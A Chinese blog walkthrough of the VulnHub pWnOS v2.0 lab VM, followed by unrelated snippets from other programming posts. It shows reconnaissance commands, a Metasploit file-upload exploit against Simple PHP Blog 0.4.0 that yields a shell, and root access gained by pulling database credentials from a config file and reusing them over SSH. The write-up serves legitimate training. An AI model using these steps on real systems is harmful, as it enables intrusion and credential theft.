当前位置：首页 > news >正文

vulnhub pWnOS v2.0通关

news 2025/7/7 6:21:22

知识点总结：

1.通过模块来寻找漏洞

2.msf查找漏洞

3.通过网站源代码，查看模块信息

环境准备

攻击机：kali2023

靶机：pWnOS v2.0

安装地址：pWnOS: 2.0 (Pre-Release) ~ VulnHub

在安装网址中看到，该靶机静态IP为10.10.10.100

所以我们就要修改虚拟机的"虚拟网络编辑器"

其次靶机的虚拟机设置如下：

开始渗透！

信息收集

收集IP(虽然已经知道了)

arp-scan -l

端口扫描

先大概看一下

nmap 10.10.10.100

再详细看一下

nmap -A -p- 10.10.10.100

看到内核版本等

访问一下80端口

扫一下目录

gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt

扫到了/blog目录，访问

查看源代码

查看到建立博客的模块模版是Simple PHP Blog 0.4.0

漏洞查找

msf查找有没有现成的漏洞

search Simple PHP Blog 0.4.0

存在，那我们直接利用

use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog      //填有该模块的url，此处写为uri
run                  //运行
shell                  //开启命令行
python -c 'import pty;pty.spawn("/bin/bash")'  //优化命令行

提权

查看一下目录

存在文件：mysqli_connect.php，看看

拿到数据库root密码，登录

看看能不能拿到相关账户密码，分别执行下述命令爆库

show databases;
use mysql;
show tables;
select * from user;

最后看到

看到root的好多密码都是一致的，具体解密我也不知道，所以没有解密成功！

但是我们可以用上面的那个密码再登录一下ssh试试

ssh root@10.10.10.100

成功root！

vulnhub pWnOS v2.0通关

知识点总结： 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码，查看模块信息环境准备攻击机：kali2023 靶机：pWnOS v2.0 安装地址：pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到，该靶…...

编程日记 2024/4/3 22:32:31

leetcode热题100.数据流的中位数

作者：晓宜 🌈🌈🌈 个人简介：互联网大厂Java准入职，阿里云专家博主，csdn后端优质创作者，算法爱好者 ❤️❤️❤️ 你的关注是我前进的动力😊 Problem: 295. 数据流的中位数…...

编程日记 2024/4/3 22:31:30

C 从函数返回指针

我们已经了解了 C 语言中如何从函数返回数组，类似地，C 允许您从函数返回指针。为了做到这点，您必须声明一个返回指针的函数，如下所示： int * myFunction() { . . . }另外，C 语言不支持在调用函数时返回局部…...

编程日记 2024/4/3 22:30:28

(文章复现)考虑分布式电源不确定性的配电网鲁棒动态重构

参考文献： [1]徐俊俊,吴在军,周力,等.考虑分布式电源不确定性的配电网鲁棒动态重构[J].中国电机工程学报,2018,38(16):4715-47254976. 1.摘要间歇性分布式电源并网使得配电网网络重构过程需要考虑更多的不确定因素。在利用仿射数对分布式电源出力的不确定性进行合…...

编程日记 2024/4/3 22:28:27

蓝桥杯第八届c++大学B组详解

目录 1.购物单 2.等差素数列 3.承压计算 4.方格分割 5.日期问题 6.包子凑数 7.全球变暖 8.k倍区间 1.购物单题目解析：就是将折扣字符串转化为数字，进行相加求和。 #include<iostream> #include<string> #include<cmath> usin…...

编程日记 2024/4/3 22:26:24

小于n的最大数 Leetcode 902 Numbers At Most N Given Digit Set

这两个问题的本质就是一个棵树，然后根据n对树做剪枝。难点在于剪的时候边界条件有些坑，get_lower_largest_digit_dic是这两个题目的共同点题目一： 小于n的最大数算法题目：小于n的最大数问题描述：给一个数组nums[5…...

编程日记 2024/4/3 22:23:21

Leetcode刷题-数组（二分法、双指针法、窗口滑动）

数组 1、二分法 704. 二分查找 - 力扣（LeetCode） 需要注意区间的问题。首先在最外面的循环判断条件是left<right。那就说明我们区间规定的范围就是【left,right】属于是左闭右闭！！！！！&…...

编程日记 2024/4/3 22:22:20

STM32学习和实践笔记（4）: 分析和理解GPIO_InitTypeDef GPIO_InitStructure (b)

继续上篇博文：STM32学习和实践笔记（4）: 分析和理解GPIO_InitTypeDef GPIO_InitStructure (a)-CSDN博客往下写， 为什么：当GPIO_InitStructure.GPIO_PinGPIO_Pin_0 ; 时，其实就是将对应的该引脚的寄存器地…...

编程日记 2024/4/3 22:20:18

数据仓库——事实表

数据仓库基础笔记思维导图已经整理完毕，完整连接为： 数据仓库基础知识笔记思维导图事实表事务事实表事务事实表用于跟踪事件，通过存储事实和与之关联的维度细节，允许单独或聚集地研究行为。粒度稀疏性包含可加事实无事实的…...

编程日记 2024/4/3 22:14:12

人工智能常用的编程语言有哪些？

人工智能常用的编程语言包括Python、Java、C、R、Lisp和Prolog等。具体选择取决于项目需求、技术背景和性能要求。 Python是AI领域的明星语言，由于其简洁易懂的语法、丰富的库支持以及庞大的社区资源，适用于机器学习、深度学习和自然语言处理等领域。 …...

编程日记 2024/4/3 22:11:09

【Leetcode每日一题】模拟 - 提莫攻击（难度⭐）（45）

1. 题目解析题目链接：495. 提莫攻击 2.算法原理一、分情况讨论要计算中毒的总时长，我们需要考虑时间点之间的差值，并根据这些差值来确定中毒的实际持续时间。情况一：差值大于等于中毒时间假设你的角色在时间点A中毒&#…...

编程日记 2024/4/3 22:10:07

OPPO云VPC网络实践

1 OPPO 云网络现状随着OPPO业务的快速发展，OPPO云规模增长迅速。大规模虚拟实例的弹性伸缩、低延时需求对网络提出了诸多挑战。原有基于VLAN搭建的私有网络无法解决这些问题，给网络运维和业务的快速上线带来了挑战。梳理存在的主要问题如下&#xf…...

编程日记 2024/4/3 22:05:56

力扣（数组）找到所有数组中消失的数字

给你一个含 n 个整数的数组 nums ，其中 nums[i] 在区间 [1, n] 内。请你找出所有在 [1, n] 范围内但没有出现在 nums 中的数字，并以数组的形式返回结果。示例 1： 输入：nums [4,3,2,7,8,2,3,1] 输出：[5,6]示例 2&am…...

编程日记 2024/4/3 22:00:49

每日面经分享（Spring Boot: part3 Service层）

SpringBoot Service层的作用 a. 封装业务逻辑：Service层负责封装应用程序的业务逻辑。Service层是控制器（Controller）和数据访问对象（DAO）之间的中间层，负责处理业务规则和业务流程。通过将业务逻辑封装在S…...

编程日记 2024/4/3 21:53:41

k8s的pod访问service的方式

背景在k8s中容器访问某个service服务时有两种方式，一种是把每个要访问的service的ip注入到客户端pod的环境变量中，另一种是客户端pod先通过DNS服务器查找对应service的ip地址，然后在通过这个service ip地址访问对应的service服务 pod客户端…...

编程日记 2024/4/3 21:50:36

shell脚本发布docker-nginx vue2 项目示例

docker、git、node.js安装略过。使git pull或者git push不需要输入密码操作方法 nginx安装在docker容器里面，参见：https://blog.csdn.net/HSJ0170/article/details/128631155 姊妹篇（宿主机nginx，非docker-nginx）&am…...

编程日记 2024/4/3 21:47:34

【THM】Nmap Basic Port Scans（基本端口扫描）-初级渗透测试

介绍本房间是Nmap系列的第二个房间（网络安全简介模块的一部分）。 1.Nmap实时主机发现 2.Nmap基本端口扫描 3.Nmap高级端口扫描 4.Nmap后端口扫描在之前的房间里，我们专注于发现在线系统。到目前为止，我们已经介绍了Nmap扫描的三个步骤：枚举目标发现活动主机反向-…...

编程日记 2024/4/3 21:46:33

Groovy结合Java在生产中的落地实战

Groovy简介 Groovy是用于Java虚拟机的一种敏捷的动态语言，是一种成熟的面向对象编程语言，又是一种纯粹的脚本语言。Groovy运行在JVM环境上，在语法上兼具java 语言和脚本语言特点，大大简化了语法。同时又具有闭包和动态语言中的其…...

编程日记 2024/4/3 21:44:31

达梦数据库创建外部表 [-7082]:外部表数据错误.

1：定义外部表，是指不存在于数据库中的表。通过向达梦提供描述外部表的元数据，可以把一个操作系统文件当成一个只读的数据库表，就像这些数据存储在一个普通数据库表中一样来进行访问。外部表的数据存储在操作系统中&#xff0…...

编程日记 2024/4/3 21:42:29

XUbuntu22.04之激活Linux最新Typora版本(二百二十五)

简介： CSDN博客专家，专注Android/Linux系统，分享多mic语音方案、音视频、编解码等技术，与大家一起成长！ 优质专栏：Audio工程师进阶系列【原创干货持续更新中……】🚀 优质专栏：多媒…...

编程日记 2024/4/3 21:41:28

RocketMQ延迟消息机制

两种延迟消息 RocketMQ中提供了两种延迟消息机制指定固定的延迟级别通过在Message中设定一个MessageDelayLevel参数，对应18个预设的延迟级别指定时间点的延迟级别通过在Message中设定一个DeliverTimeMS指定一个Long类型表示的具体时间点。到了时间点后&#xf…...

编程新知 2025/7/1 20:41:53

在 Nginx Stream 层“改写”MQTT ngx_stream_mqtt_filter_module

1、为什么要修改 CONNECT 报文？ 多租户隔离：自动为接入设备追加租户前缀，后端按 ClientID 拆分队列。零代码鉴权：将入站用户名替换为 OAuth Access-Token，后端 Broker 统一校验。灰度发布：根据 IP/地理位写…...

编程新知 2025/6/27 14:22:50

Ascend NPU上适配Step-Audio模型

1 概述 1.1 简述 Step-Audio 是业界首个集语音理解与生成控制一体化的产品级开源实时语音对话系统，支持多语言对话（如中文，英文，日语），语音情感（如开心，悲伤）&#x…...

编程新知 2025/7/6 22:37:23

大模型多显卡多服务器并行计算方法与实践指南

一、分布式训练概述大规模语言模型的训练通常需要分布式计算技术，以解决单机资源不足的问题。分布式训练主要分为两种模式：数据并行：将数据分片到不同设备，每个设备拥有完整的模型副本模型并行：将模型分割到不同设备，每个设备处理部分模型计算现代大模型训练通常结合…...

编程新知 2025/6/24 6:21:26

安装 pip install pytest用例可以是函数也可以是类中的方法 def test_func():print()class TestAdd: # def __init__(self): 在 pytest 中不可以使用__init__方法 # self.cc 12345 pytest.mark.api def test_str(self):res add(1, 2)assert res 12def test_int(self):r…...

编程新知 2025/7/6 14:53:36